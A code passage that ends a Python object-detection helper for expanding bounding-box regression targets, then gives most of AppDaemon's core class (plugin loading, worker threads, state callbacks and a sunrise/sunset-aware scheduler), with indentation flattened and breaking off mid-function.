for t in threads: t.start()
for t in threads: t.join()
# Single thread
# for im_i in range(num_images):
# print "-----processing img {}".format(im_i)
# rois = roidb[im_i]['boxes']
# max_overlaps = roidb[im_i]['max_overlaps']
# max_classes = roidb[im_i]['max_classes']
# ins_seg = roidb[im_i]['ins_seg']
# # roidb[im_i]['mask_targets'] = compute_bbox_mask_targets(rois, max_overlaps, max_classes, ins_seg)
# roidb[im_i]['mask_targets'], roidb[im_i]['mask_labels'], roidb[im_i]['mask_inds'] = \
# compute_bbox_mask_targets_and_label(rois, max_overlaps, max_classes, ins_seg)
def expand_bbox_regression_targets(bbox_targets_data, num_classes):
"""
expand from 5 to 4 * num_classes; only the right class has non-zero bbox regression targets
:param bbox_targets_data: [k * 5]
:param num_classes: number of classes
:return: bbox target processed [k * 4 num_classes]
bbox_weights ! only foreground boxes have bbox regression computation!
"""
classes = bbox_targets_data[:, 0]
bbox_targets = np.zeros((classes.size, 4 * num_classes), dtype=np.float32)
bbox_weights = np.zeros(bbox_targets.shape, dtype=np.float32)
indexes = np.where(classes > 0)[0]
for index in indexes:
cls = classes[index]
start = int(4 * cls)
end = start + 4
bbox_targets[index, start:end] = bbox_targets_data[index, 1:]
bbox_weights[index, start:end] = config.TRAIN.BBOX_WEIGHTS
return bbox_targets, bbox_weights
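# Worked sketch: with num_classes = 3, a foreground row labelled class 2 with
# targets [2, dx, dy, dw, dh] expands to a 12-column row whose columns 8:12
# hold (dx, dy, dw, dh); bbox_weights are non-zero only in that same slice.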
|
appdaemon.py
|
import sys
import importlib
import traceback
import os
import os.path
from queue import Queue
import datetime
import uuid
import astral
import pytz
import math
import asyncio
import yaml
import concurrent.futures
import threading
import random
import re
from copy import deepcopy, copy
import subprocess
import functools
import time
import cProfile
import io
import pstats
import appdaemon.utils as utils
class AppDaemon:
required_meta = ["latitude", "longitude", "elevation", "time_zone"]
def __init__(self, logger, error, diag, loop, **kwargs):
self.logger = logger
self.error = error
self.diagnostic = diag
self.config = kwargs
self.config["ad_version"] = utils.__version__
self.q = Queue(maxsize=0)
self.check_app_updates_profile = ""
self.was_dst = False
self.last_state = None
self.last_plugin_state = {}
self.monitored_files = {}
self.filter_files = {}
self.modules = {}
self.appq = None
self.executor = None
self.loop = None
self.srv = None
self.appd = None
self.stopping = False
self.dashboard = None
self.now = datetime.datetime.now().timestamp()
self.objects = {}
self.objects_lock = threading.RLock()
self.schedule = {}
self.schedule_lock = threading.RLock()
self.callbacks = {}
self.callbacks_lock = threading.RLock()
self.thread_info = {}
self.thread_info_lock = threading.RLock()
self.thread_info["threads"] = {}
self.thread_info["current_busy"] = 0
self.thread_info["max_busy"] = 0
self.thread_info["max_busy_time"] = 0
self.thread_info["last_action_time"] = 0
self.state = {}
self.state["default"] = {}
self.state_lock = threading.RLock()
self.endpoints = {}
self.endpoints_lock = threading.RLock()
self.plugin_meta = {}
self.plugin_objs = {}
# No locking yet
self.global_vars = {}
self.sun = {}
self.config_file_modified = 0
self.tz = None
self.realtime = True
self.version = 0
self.app_config_file_modified = 0
self.app_config = {}
self.app_config_file = None
self._process_arg("app_config_file", kwargs)
self.plugin_params = kwargs["plugins"]
# User Supplied/Defaults
self.threads = 10
self._process_arg("threads", kwargs, int=True)
self.app_dir = None
self._process_arg("app_dir", kwargs)
self.starttime = None
self._process_arg("starttime", kwargs)
self._process_arg("now", kwargs)
self.logfile = None
self._process_arg("logfile", kwargs)
if self.logfile is None:
self.logfile = "STDOUT"
self.latitude = None
self._process_arg("latitude", kwargs)
self.longitude = None
self._process_arg("longitude", kwargs)
self.elevation = None
self._process_arg("elevation", kwargs)
self.time_zone = None
self._process_arg("time_zone", kwargs)
self.errfile = None
self._process_arg("error_file", kwargs)
if self.errfile is None:
self.errfile = "STDERR"
self.config_file = None
self._process_arg("config_file", kwargs)
self.config_dir = None
self._process_arg("config_dir", kwargs)
self.plugins = {}
self._process_arg("plugins", kwargs)
self.tick = 1
self._process_arg("tick", kwargs, int=True)
self.max_clock_skew = 1
self._process_arg("max_clock_skew", kwargs, int=True)
self.threadpool_workers = 10
self._process_arg("threadpool_workers", kwargs, int=True)
self.endtime = None
if "endtime" in kwargs:
self.endtime = datetime.datetime.strptime(kwargs["endtime"], "%Y-%m-%d %H:%M:%S")
self.interval = 1
self._process_arg("interval", kwargs, int=True)
self.loglevel = "INFO"
self._process_arg("loglevel", kwargs)
self.api_port = None
self._process_arg("api_port", kwargs)
self.utility_delay = 1
self._process_arg("utility_delay", kwargs, int=True)
self.max_utility_skew = self.utility_delay * 0.9
self._process_arg("max_utility_skew", kwargs, float=True)
self.check_app_updates_profile = False
self._process_arg("check_app_updates_profile", kwargs)
self.production_mode = False
self._process_arg("production_mode", kwargs)
self.invalid_yaml_warnings = True
self._process_arg("invalid_yaml_warnings", kwargs)
self.missing_app_warnings = True
self._process_arg("missing_app_warnings", kwargs)
self.log_thread_actions = False
self._process_arg("log_thread_actions", kwargs)
self.exclude_dirs = ["__pycache__"]
if "exclude_dirs" in kwargs:
self.exclude_dirs += kwargs["exclude_dirs"]
        self.stop_function = None
        self._process_arg("stop_function", kwargs)
if self.tick != 1 or self.interval != 1 or self.starttime is not None:
self.realtime = False
if not kwargs.get("cert_verify", True):
self.certpath = False
if kwargs.get("disable_apps") is True:
self.apps = False
self.log("INFO", "Apps are disabled")
else:
self.apps = True
self.log("INFO", "Starting Apps")
# Initialize config file tracking
self.app_config_file_modified = 0
self.app_config_files = {}
self.module_dirs = []
if self.apps is True:
if self.app_dir is None:
if self.config_dir is None:
self.app_dir = utils.find_path("apps")
self.config_dir = os.path.dirname(self.app_dir)
else:
self.app_dir = os.path.join(self.config_dir, "apps")
utils.check_path("config_dir", logger, self.config_dir, permissions="rwx")
utils.check_path("appdir", logger, self.app_dir)
#if os.path.isdir(self.app_dir) is False:
# self.log("ERROR", "Invalid value for app_dir: {}".format(self.app_dir))
# return
#
# Initial Setup
#
self.appq = asyncio.Queue(maxsize=0)
self.log("DEBUG", "Creating worker threads ...")
# Create Worker Threads
for i in range(self.threads):
t = threading.Thread(target=self.worker)
t.daemon = True
t.setName("thread-{}".format(i+1))
with self.thread_info_lock:
self.thread_info["threads"][t.getName()] = {"callback": "idle", "time_called": 0, "thread": t}
t.start()
if self.apps is True:
self.process_filters()
self.log("DEBUG", "Done")
self.loop = loop
self.stopping = False
self.log("DEBUG", "Entering run()")
self.executor = concurrent.futures.ThreadPoolExecutor(max_workers=self.threadpool_workers)
# Load Plugins
plugins = []
if os.path.isdir(os.path.join(self.config_dir, "custom_plugins")):
plugins = [f.path for f in os.scandir(os.path.join(self.config_dir, "custom_plugins")) if f.is_dir(follow_symlinks=True)]
for plugin in plugins:
sys.path.insert(0, plugin)
if self.plugins is not None:
for name in self.plugins:
basename = self.plugins[name]["type"]
type = self.plugins[name]["type"]
module_name = "{}plugin".format(basename)
class_name = "{}Plugin".format(basename.capitalize())
full_module_name = None
for plugin in plugins:
if os.path.basename(plugin) == type:
full_module_name = "{}".format(module_name)
self.log("INFO",
"Loading Custom Plugin {} using class {} from module {}".format(name, class_name,
module_name))
break
                if full_module_name is None:
#
# Not a custom plugin, assume it's a built in
#
basepath = "appdaemon.plugins"
full_module_name = "{}.{}.{}".format(basepath, basename, module_name)
self.log("INFO",
"Loading Plugin {} using class {} from module {}".format(name, class_name,
module_name))
try:
mod = __import__(full_module_name, globals(), locals(), [module_name], 0)
app_class = getattr(mod, class_name)
plugin = app_class(self, name, self.logger, self.err, self.loglevel, self.plugins[name])
namespace = plugin.get_namespace()
if namespace in self.plugin_objs:
raise ValueError("Duplicate namespace: {}".format(namespace))
self.plugin_objs[namespace] = plugin
loop.create_task(plugin.get_updates())
except:
self.log("WARNING", "error loading plugin: {} - ignoring".format(name))
self.log("WARNING", '-' * 60)
self.log("WARNING", traceback.format_exc())
self.log("WARNING", '-' * 60)
# Create utility loop
self.log("DEBUG", "Starting utility loop")
loop.create_task(self.utility())
# Create AppState Loop
if self.apps:
loop.create_task(self.appstate_loop())
def _process_arg(self, arg, args, **kwargs):
if args:
if arg in args:
value = args[arg]
if "int" in kwargs and kwargs["int"] is True:
try:
value = int(value)
setattr(self, arg, value)
except ValueError:
self.log("WARNING", "Invalid value for {}: {}, using default({})".format(arg, value, getattr(self, arg)))
if "float" in kwargs and kwargs["float"] is True:
try:
value = float(value)
setattr(self, arg, value)
except ValueError:
self.log("WARNING", "Invalid value for {}: {}, using default({})".format(arg, value, getattr(self, arg)))
else:
setattr(self, arg, value)
def _timeit(func):
@functools.wraps(func)
def newfunc(self, *args, **kwargs):
start_time = time.time()
result = func(self, *args, **kwargs)
elapsed_time = time.time() - start_time
self.log("INFO", 'function [{}] finished in {} ms'.format(
func.__name__, int(elapsed_time * 1000)))
return result
return newfunc
def _profile_this(fn):
def profiled_fn(self, *args, **kwargs):
self.pr = cProfile.Profile()
self.pr.enable()
result = fn(self, *args, **kwargs)
self.pr.disable()
s = io.StringIO()
sortby = 'cumulative'
            ps = pstats.Stats(self.pr, stream=s).sort_stats(sortby)
            ps.print_stats()
            self.profile = fn.__name__ + s.getvalue()
return result
return profiled_fn
def stop(self):
self.stopping = True
# if ws is not None:
# ws.close()
if self.apps:
self.appq.put_nowait({"namespace": "global", "event_type": "ha_stop", "data": None})
for plugin in self.plugin_objs:
self.plugin_objs[plugin].stop()
#
# Diagnostics
#
def dump_callbacks(self):
if self.callbacks == {}:
self.diag("INFO", "No callbacks")
else:
self.diag("INFO", "--------------------------------------------------")
self.diag("INFO", "Callbacks")
self.diag("INFO", "--------------------------------------------------")
for name in self.callbacks.keys():
self.diag("INFO", "{}:".format(name))
for uuid_ in self.callbacks[name]:
self.diag( "INFO", " {} = {}".format(uuid_, self.callbacks[name][uuid_]))
self.diag("INFO", "--------------------------------------------------")
def dump_objects(self):
self.diag("INFO", "--------------------------------------------------")
self.diag("INFO", "Objects")
self.diag("INFO", "--------------------------------------------------")
with self.objects_lock:
for object_ in self.objects.keys():
self.diag("INFO", "{}: {}".format(object_, self.objects[object_]))
self.diag("INFO", "--------------------------------------------------")
def dump_queue(self):
self.diag("INFO", "--------------------------------------------------")
self.diag("INFO", "Current Queue Size is {}".format(self.q.qsize()))
self.diag("INFO", "--------------------------------------------------")
@staticmethod
def atoi(text):
return int(text) if text.isdigit() else text
def natural_keys(self, text):
        return [self.atoi(c) for c in re.split(r'(\d+)', text)]
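    # Illustrative note: natural_keys is intended as a sort key, e.g.
    # sorted(["thread-10", "thread-2"], key=self.natural_keys) yields
    # ["thread-2", "thread-10"] rather than lexicographic order.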
def get_thread_info(self):
info = {}
# Make a copy without the thread objects
with self.thread_info_lock:
info["max_busy_time"] = copy(self.thread_info["max_busy_time"])
info["last_action_time"] = copy(self.thread_info["last_action_time"])
info["current_busy"] = copy(self.thread_info["current_busy"])
info["max_busy"] = copy(self.thread_info["max_busy"])
info["threads"] = {}
for thread in self.thread_info["threads"]:
if thread not in info["threads"]:
info["threads"][thread] = {}
info["threads"][thread]["time_called"] = self.thread_info["threads"][thread]["time_called"]
info["threads"][thread]["callback"] = self.thread_info["threads"][thread]["callback"]
info["threads"][thread]["is_alive"] = self.thread_info["threads"][thread]["thread"].is_alive()
return info
def dump_threads(self):
self.diag("INFO", "--------------------------------------------------")
self.diag("INFO", "Threads")
self.diag("INFO", "--------------------------------------------------")
with self.thread_info_lock:
max_ts = datetime.datetime.fromtimestamp(self.thread_info["max_busy_time"])
last_ts = datetime.datetime.fromtimestamp(self.thread_info["last_action_time"])
self.diag("INFO", "Currently busy threads: {}".format(self.thread_info["current_busy"]))
self.diag("INFO", "Most used threads: {} at {}".format(self.thread_info["max_busy"], max_ts))
self.diag("INFO", "Last activity: {}".format(last_ts))
self.diag("INFO", "--------------------------------------------------")
for thread in sorted(self.thread_info["threads"], key=self.natural_keys):
ts = datetime.datetime.fromtimestamp(self.thread_info["threads"][thread]["time_called"])
self.diag("INFO",
"{} - current callback: {} since {}, alive: {}".format(
thread,
self.thread_info["threads"][thread]["callback"],
ts,
self.thread_info["threads"][thread]["thread"].is_alive()
))
self.diag("INFO", "--------------------------------------------------")
def get_callback_entries(self):
callbacks = {}
for name in self.callbacks.keys():
callbacks[name] = {}
for uuid_ in self.callbacks[name]:
callbacks[name][uuid_] = {}
if "entity" in callbacks[name][uuid_]:
callbacks[name][uuid_]["entity"] = self.callbacks[name][uuid_]["entity"]
else:
callbacks[name][uuid_]["entity"] = None
callbacks[name][uuid_]["type"] = self.callbacks[name][uuid_]["type"]
callbacks[name][uuid_]["kwargs"] = self.callbacks[name][uuid_]["kwargs"]
callbacks[name][uuid_]["function"] = self.callbacks[name][uuid_]["function"]
callbacks[name][uuid_]["name"] = self.callbacks[name][uuid_]["name"]
return callbacks
#
# Constraints
#
def check_constraint(self, key, value, app):
unconstrained = True
if key in app.list_constraints():
method = getattr(app, key)
unconstrained = method(value)
return unconstrained
def check_time_constraint(self, args, name):
unconstrained = True
if "constrain_start_time" in args or "constrain_end_time" in args:
if "constrain_start_time" not in args:
start_time = "00:00:00"
else:
start_time = args["constrain_start_time"]
if "constrain_end_time" not in args:
end_time = "23:59:59"
else:
end_time = args["constrain_end_time"]
if not self.now_is_between(start_time, end_time, name):
unconstrained = False
return unconstrained
#
# Thread Management
#
def dispatch_worker(self, name, args):
with self.objects_lock:
unconstrained = True
#
# Argument Constraints
#
for arg in self.app_config[name].keys():
constrained = self.check_constraint(arg, self.app_config[name][arg], self.objects[name]["object"])
if not constrained:
unconstrained = False
if not self.check_time_constraint(self.app_config[name], name):
unconstrained = False
#
# Callback level constraints
#
if "kwargs" in args:
for arg in args["kwargs"].keys():
constrained = self.check_constraint(arg, args["kwargs"][arg], self.objects[name]["object"])
if not constrained:
unconstrained = False
if not self.check_time_constraint(args["kwargs"], name):
unconstrained = False
if unconstrained:
self.q.put_nowait(args)
def update_thread_info(self, thread_id, callback, type = None):
if self.log_thread_actions:
if callback == "idle":
self.diag("INFO",
"{} done".format(thread_id, type, callback))
else:
self.diag("INFO",
"{} calling {} callback {}".format(thread_id, type, callback))
with self.thread_info_lock:
ts = self.now
self.thread_info["threads"][thread_id]["callback"] = callback
self.thread_info["threads"][thread_id]["time_called"] = ts
if callback == "idle":
self.thread_info["current_busy"] -= 1
else:
self.thread_info["current_busy"] += 1
if self.thread_info["current_busy"] > self.thread_info["max_busy"]:
self.thread_info["max_busy"] = self.thread_info["current_busy"]
self.thread_info["max_busy_time"] = ts
self.thread_info["last_action_time"] = ts
# noinspection PyBroadException
def worker(self):
while True:
thread_id = threading.current_thread().name
args = self.q.get()
_type = args["type"]
funcref = args["function"]
_id = args["id"]
name = args["name"]
callback = "{}() in {}".format(funcref.__name__, name)
app = None
with self.objects_lock:
if name in self.objects and self.objects[name]["id"] == _id:
app = self.objects[name]["object"]
if app is not None:
try:
if _type == "timer":
self.update_thread_info(thread_id, callback, _type)
funcref(self.sanitize_timer_kwargs(app, args["kwargs"]))
self.update_thread_info(thread_id, "idle")
elif _type == "attr":
entity = args["entity"]
attr = args["attribute"]
old_state = args["old_state"]
new_state = args["new_state"]
self.update_thread_info(thread_id, callback, _type)
funcref(entity, attr, old_state, new_state,
self.sanitize_state_kwargs(app, args["kwargs"]))
self.update_thread_info(thread_id, "idle")
elif _type == "event":
data = args["data"]
self.update_thread_info(thread_id, callback, _type)
funcref(args["event"], data, args["kwargs"])
self.update_thread_info(thread_id, "idle")
except:
self.err("WARNING", '-' * 60)
self.err("WARNING", "Unexpected error in worker for App {}:".format(name))
self.err("WARNING", "Worker Ags: {}".format(args))
self.err("WARNING", '-' * 60)
self.err("WARNING", traceback.format_exc())
self.err("WARNING", '-' * 60)
if self.errfile != "STDERR" and self.logfile != "STDOUT":
self.log("WARNING", "Logged an error to {}".format(self.errfile))
else:
self.log("WARNING", "Found stale callback for {} - discarding".format(name))
self.q.task_done()
#
# State
#
def entity_exists(self, namespace, entity):
with self.state_lock:
if namespace in self.state and entity in self.state[namespace]:
return True
else:
return False
def add_state_callback(self, name, namespace, entity, cb, kwargs):
with self.callbacks_lock:
if name not in self.callbacks:
self.callbacks[name] = {}
handle = uuid.uuid4()
with self.objects_lock:
self.callbacks[name][handle] = {
"name": name,
"id": self.objects[name]["id"],
"type": "state",
"function": cb,
"entity": entity,
"namespace": namespace,
"kwargs": kwargs
}
#
# In the case of a quick_start parameter,
# start the clock immediately if the device is already in the new state
#
if "immediate" in kwargs and kwargs["immediate"] is True:
if entity is not None and "new" in kwargs and "duration" in kwargs:
with self.state_lock:
if self.state[namespace][entity]["state"] == kwargs["new"]:
exec_time = self.get_now_ts() + int(kwargs["duration"])
kwargs["_duration"] = self.insert_schedule(
name, exec_time, cb, False, None,
entity=entity,
attribute=None,
old_state=None,
new_state=kwargs["new"], **kwargs
)
return handle
def cancel_state_callback(self, handle, name):
with self.callbacks_lock:
if name not in self.callbacks or handle not in self.callbacks[name]:
self.log("WARNING", "Invalid callback in cancel_state_callback() from app {}".format(name))
if name in self.callbacks and handle in self.callbacks[name]:
del self.callbacks[name][handle]
if name in self.callbacks and self.callbacks[name] == {}:
del self.callbacks[name]
def info_state_callback(self, handle, name):
with self.callbacks_lock:
if name in self.callbacks and handle in self.callbacks[name]:
callback = self.callbacks[name][handle]
with self.objects_lock:
return (
callback["namespace"],
callback["entity"],
callback["kwargs"].get("attribute", None),
self.sanitize_state_kwargs(self.objects[name]["object"], callback["kwargs"])
)
else:
raise ValueError("Invalid handle: {}".format(handle))
def get_entity(self, namespace, entity_id):
with self.state_lock:
if namespace in self.state:
if entity_id in self.state[namespace]:
return self.state[namespace][entity_id]
else:
return None
else:
self.log("WARNING", "Unknown namespace: {}".format(namespace))
return None
def get_state(self, namespace, device, entity, attribute):
with self.state_lock:
if device is None:
return deepcopy(self.state[namespace])
elif entity is None:
devices = {}
for entity_id in self.state[namespace].keys():
thisdevice, thisentity = entity_id.split(".")
if device == thisdevice:
devices[entity_id] = self.state[namespace][entity_id]
return deepcopy(devices)
elif attribute is None:
entity_id = "{}.{}".format(device, entity)
if entity_id in self.state[namespace]:
return deepcopy(self.state[namespace][entity_id]["state"])
else:
return None
else:
entity_id = "{}.{}".format(device, entity)
if attribute == "all":
if entity_id in self.state[namespace]:
return deepcopy(self.state[namespace][entity_id])
else:
return None
else:
if attribute in self.state[namespace][entity_id]["attributes"]:
return deepcopy(self.state[namespace][entity_id]["attributes"][
attribute])
elif attribute in self.state[namespace][entity_id]:
return deepcopy(self.state[namespace][entity_id][attribute])
else:
return None
def set_state(self, namespace, entity, state):
with self.state_lock:
self.state[namespace][entity] = state
#
# App State
#
async def appstate_loop(self):
while not self.stopping:
args = await self.appq.get()
namespace = args["namespace"]
await self.state_update(namespace, args)
self.appq.task_done()
def set_app_state(self, namespace, entity_id, state):
self.log("DEBUG", "set_app_state: {}".format(entity_id))
#print(state)
if entity_id is not None and "." in entity_id:
with self.state_lock:
if entity_id in self.state[namespace]:
old_state = self.state[namespace][entity_id]
else:
old_state = None
data = {"entity_id": entity_id, "new_state": state, "old_state": old_state}
args = {"namespace": namespace, "event_type": "state_changed", "data": data}
self.state[namespace][entity_id] = state
self.appq.put_nowait(args)
#
# Events
#
def add_event_callback(self, _name, namespace, cb, event, **kwargs):
with self.callbacks_lock:
if _name not in self.callbacks:
self.callbacks[_name] = {}
handle = uuid.uuid4()
with self.objects_lock:
self.callbacks[_name][handle] = {
"name": _name,
"id": self.objects[_name]["id"],
"type": "event",
"function": cb,
"namespace": namespace,
"event": event,
"kwargs": kwargs
}
return handle
def cancel_event_callback(self, name, handle):
with self.callbacks_lock:
if name in self.callbacks and handle in self.callbacks[name]:
del self.callbacks[name][handle]
if name in self.callbacks and self.callbacks[name] == {}:
del self.callbacks[name]
def info_event_callback(self, name, handle):
with self.callbacks_lock:
if name in self.callbacks and handle in self.callbacks[name]:
callback = self.callbacks[name][handle]
return callback["event"], callback["kwargs"].copy()
else:
raise ValueError("Invalid handle: {}".format(handle))
#
# Scheduler
#
def cancel_timer(self, name, handle):
self.log("DEBUG", "Canceling timer for {}".format(name))
with self.schedule_lock:
if name in self.schedule and handle in self.schedule[name]:
del self.schedule[name][handle]
if name in self.schedule and self.schedule[name] == {}:
del self.schedule[name]
# noinspection PyBroadException
def exec_schedule(self, name, entry, args):
try:
# Locking performed in calling function
if "inactive" in args:
return
# Call function
with self.objects_lock:
if "entity" in args["kwargs"]:
self.dispatch_worker(name, {
"name": name,
"id": self.objects[name]["id"],
"type": "attr",
"function": args["callback"],
"attribute": args["kwargs"]["attribute"],
"entity": args["kwargs"]["entity"],
"new_state": args["kwargs"]["new_state"],
"old_state": args["kwargs"]["old_state"],
"kwargs": args["kwargs"],
})
else:
self.dispatch_worker(name, {
"name": name,
"id": self.objects[name]["id"],
"type": "timer",
"function": args["callback"],
"kwargs": args["kwargs"],
})
# If it is a repeating entry, rewrite with new timestamp
if args["repeat"]:
if args["type"] == "next_rising" or args["type"] == "next_setting":
# It's sunrise or sunset - if the offset is negative we
# won't know the next rise or set time yet, so mark the entry
# inactive and let process_sun() re-arm it at the next rise/set
if args["offset"] < 0:
args["inactive"] = 1
else:
# We have a valid time for the next sunrise/set so use it
c_offset = self.get_offset(args)
args["timestamp"] = self.calc_sun(args["type"]) + c_offset
args["offset"] = c_offset
else:
# Not sunrise or sunset so just increment
# the timestamp with the repeat interval
args["basetime"] += args["interval"]
args["timestamp"] = args["basetime"] + self.get_offset(args)
else: # Otherwise just delete
del self.schedule[name][entry]
except:
self.err("WARNING", '-' * 60)
self.err(
"WARNING",
"Unexpected error during exec_schedule() for App: {}".format(name)
)
self.err("WARNING", "Args: {}".format(args))
self.err("WARNING", '-' * 60)
self.err("WARNING", traceback.format_exc())
self.err("WARNING", '-' * 60)
if self.errfile != "STDERR" and self.logfile != "STDOUT":
# When explicitly logging to stdout and stderr, suppress
# verbose_log messages about writing an error (since they show up anyway)
self.log("WARNING", "Logged an error to {}".format(self.errfile))
self.err("WARNING", "Scheduler entry has been deleted")
self.err("WARNING", '-' * 60)
del self.schedule[name][entry]
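# Called when an actual sunrise/sunset occurs: any schedule entry of the matching
# type that exec_schedule() marked "inactive" (negative offset) is re-armed here
# with a timestamp recomputed from the freshly updated sun times.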
def process_sun(self, action):
self.log(
"DEBUG",
"Process sun: {}, next sunrise: {}, next sunset: {}".format(
action, self.sun["next_rising"], self.sun["next_setting"]
)
)
with self.schedule_lock:
for name in self.schedule.keys():
for entry in sorted(
self.schedule[name].keys(),
key=lambda uuid_: self.schedule[name][uuid_]["timestamp"]
):
schedule = self.schedule[name][entry]
if schedule["type"] == action and "inactive" in schedule:
del schedule["inactive"]
c_offset = self.get_offset(schedule)
schedule["timestamp"] = self.calc_sun(action) + c_offset
schedule["offset"] = c_offset
def calc_sun(self, type_):
# convert to a localized timestamp
return self.sun[type_].timestamp()
def info_timer(self, handle, name):
with self.schedule_lock:
if name in self.schedule and handle in self.schedule[name]:
callback = self.schedule[name][handle]
return (
datetime.datetime.fromtimestamp(callback["timestamp"]),
callback["interval"],
self.sanitize_timer_kwargs(self.objects[name]["object"], callback["kwargs"])
)
else:
raise ValueError("Invalid handle: {}".format(handle))
def init_sun(self):
latitude = self.latitude
longitude = self.longitude
if not -90 <= latitude <= 90:
raise ValueError("Latitude needs to be -90 .. 90")
if not -180 <= longitude <= 180:
raise ValueError("Longitude needs to be -180 .. 180")
elevation = self.elevation
self.tz = pytz.timezone(self.time_zone)
self.location = astral.Location((
'', '', latitude, longitude, self.tz.zone, elevation
))
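# Walk forward one day at a time, starting from yesterday, until the first sunrise
# and sunset strictly after the localized "now" are found; astral errors (e.g. no
# rise or set on a given day at high latitudes) are skipped. If either time changed
# since the last update, process_sun() re-arms the affected schedule entries.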
def update_sun(self):
#now = datetime.datetime.now(self.tz)
#now = pytz.utc.localize(self.get_now())
now = self.tz.localize(self.get_now())
mod = -1
while True:
try:
next_rising_dt = self.location.sunrise(
(now + datetime.timedelta(days=mod)).date(), local=False
)
if next_rising_dt > now:
break
except astral.AstralError:
pass
mod += 1
mod = -1
while True:
try:
next_setting_dt = self.location.sunset(
(now + datetime.timedelta(days=mod)).date(), local=False
)
if next_setting_dt > now:
break
except astral.AstralError:
pass
mod += 1
old_next_rising_dt = self.sun.get("next_rising")
old_next_setting_dt = self.sun.get("next_setting")
self.sun["next_rising"] = next_rising_dt
self.sun["next_setting"] = next_setting_dt
if old_next_rising_dt is not None and old_next_rising_dt != self.sun["next_rising"]:
# dump_schedule()
self.process_sun("next_rising")
# dump_schedule()
if old_next_setting_dt is not None and old_next_setting_dt != self.sun["next_setting"]:
# dump_schedule()
self.process_sun("next_setting")
# dump_schedule()
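# Resolve the offset for a sun-based schedule entry: an explicit "offset" kwarg wins
# but cannot be combined with "random_start"/"random_end"; otherwise a random offset
# is drawn between random_start and random_end (both default to 0).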
@staticmethod
def get_offset(kwargs):
if "offset" in kwargs["kwargs"]:
if "random_start" in kwargs["kwargs"] \
or "random_end" in kwargs["kwargs"]:
raise ValueError(
"Can't specify offset as well as 'random_start' or "
"'random_end' in 'run_at_sunrise()' or 'run_at_sunset()'"
)
else:
offset = kwargs["kwargs"]["offset"]
else:
rbefore = kwargs["kwargs"].get("random_start", 0)
rafter = kwargs["kwargs"].get("random_end", 0)
offset = random.randint(rbefore, rafter)
# verbose_log(conf.logger, "INFO", "sun: offset = {}".format(offset))
return offset
def insert_schedule(self, name, utc, callback, repeat, type_, **kwargs):
with self.schedule_lock:
if name not in self.schedule:
self.schedule[name] = {}
handle = uuid.uuid4()
utc = int(utc)
c_offset = self.get_offset({"kwargs": kwargs})
ts = utc + c_offset
interval = kwargs.get("interval", 0)
with self.objects_lock:
self.schedule[name][handle] = {
"name": name,
"id": self.objects[name]["id"],
"callback": callback,
"timestamp": ts,
"interval": interval,
"basetime": utc,
"repeat": repeat,
"offset": c_offset,
"type": type_,
"kwargs": kwargs
}
# verbose_log(conf.logger, "INFO", conf.schedule[name][handle])
return handle
def get_scheduler_entries(self):
schedule = {}
for name in self.schedule.keys():
schedule[name] = {}
for entry in sorted(
self.schedule[name].keys(),
key=lambda uuid_: self.schedule[name][uuid_]["timestamp"]
):
schedule[name][entry] = {}
schedule[name][entry]["timestamp"] = self.schedule[name][entry]["timestamp"]
schedule[name][entry]["type"] = self.schedule[name][entry]["type"]
schedule[name][entry]["name"] = self.schedule[name][entry]["name"]
schedule[name][entry]["basetime"] = self.schedule[name][entry]["basetime"]
schedule[name][entry]["repeat"] = self.schedule[name][entry]["basetime"]
schedule[name][entry]["offset"] = self.schedule[name][entry]["basetime"]
schedule[name][entry]["interval"] = self.schedule[name][entry]["basetime"]
schedule[name][entry]["kwargs"] = self.schedule[name][entry]["basetime"]
schedule[name][entry]["callback"] = self.schedule[name][entry]["callback"]
return schedule
def is_dst(self):
return bool(time.localtime(self.get_now_ts()).tm_isdst)
def get_now(self):
return datetime.datetime.fromtimestamp(self.now)
def get_now_ts(self):
return self.now
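# True if "now" falls inside the window built from the two time strings.
# When end < start the window spans midnight, e.g. now_is_between("22:00:00", "06:00:00")
# at 01:00 is True because now and end are shifted forward a day before comparing.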
def now_is_between(self, start_time_str, end_time_str, name=None):
start_time = self.parse_time(start_time_str, name)
end_time = self.parse_time(end_time_str, name)
now = self.get_now()
start_date = now.replace(
hour=start_time.hour, minute=start_time.minute,
second=start_time.second
)
end_date = now.replace(
hour=end_time.hour, minute=end_time.minute, second=end_time.second
)
if end_date < start_date:
# Spans midnight
if now < start_date and now < end_date:
now = now + datetime.timedelta(days=1)
end_date = end_date + datetime.timedelta(days=1)
return start_date <= now <= end_date
def sunset(self):
return datetime.datetime.fromtimestamp(self.calc_sun("next_setting"))
def sunrise(self):
return datetime.datetime.fromtimestamp(self.calc_sun("next_rising"))
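# Parse a time specification into a datetime.time. Accepted forms are "HH:MM:SS",
# "sunrise", "sunset", or "sunrise"/"sunset" plus or minus an offset,
# e.g. "sunset - 00:45:00"; anything else raises ValueError.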
def parse_time(self, time_str, name=None):
parsed_time = None
parts = re.search(r'^(\d+):(\d+):(\d+)', time_str)
if parts:
parsed_time = datetime.time(
int(parts.group(1)), int(parts.group(2)), int(parts.group(3))
)
else:
if time_str == "sunrise":
parsed_time = self.sunrise().time()
elif time_str == "sunset":
parsed_time = self.sunset().time()
else:
parts = re.search(
r'^sunrise\s*([+-])\s*(\d+):(\d+):(\d+)', time_str
)
if parts:
if parts.group(1) == "+":
parsed_time = (self.sunrise() + datetime.timedelta(
hours=int(parts.group(2)), minutes=int(parts.group(3)),
seconds=int(parts.group(4))
)).time()
else:
parsed_time = (self.sunrise() - datetime.timedelta(
hours=int(parts.group(2)), minutes=int(parts.group(3)),
seconds=int(parts.group(4))
)).time()
else:
parts = re.search(
r'^sunset\s*([+-])\s*(\d+):(\d+):(\d+)', time_str
)
if parts:
if parts.group(1) == "+":
parsed_time = (self.sunset() + datetime.timedelta(
hours=int(parts.group(2)),
minutes=int(parts.group(3)),
seconds=int(parts.group(4))
)).time()
else:
parsed_time = (self.sunset() - datetime.timedelta(
hours=int(parts.group(2)),
minutes=int(parts.group(3)),
seconds=int(parts.group(4))
)).time()
if parsed_time is None:
if name is not None:
raise ValueError(
"{}: invalid time string: {}".format(name, time_str))
else:
raise ValueError("invalid time string: {}".format(time_str))
return parsed_time
def dump_sun(self):
self.diag("INFO", "--------------------------------------------------")
self.diag("INFO", "Sun")
self.diag("INFO", "--------------------------------------------------")
self.diag("INFO", self.sun)
self.diag("INFO", "--------------------------------------------------")
def dump_schedule(self):
if self.schedule == {}:
self.diag("INFO", "Schedule is empty")
else:
self.diag("INFO", "--------------------------------------------------")
self.diag("INFO", "Scheduler Table")
self.diag("INFO", "--------------------------------------------------")
for name in self.schedule.keys():
self.diag( "INFO", "{}:".format(name))
for entry in sorted(
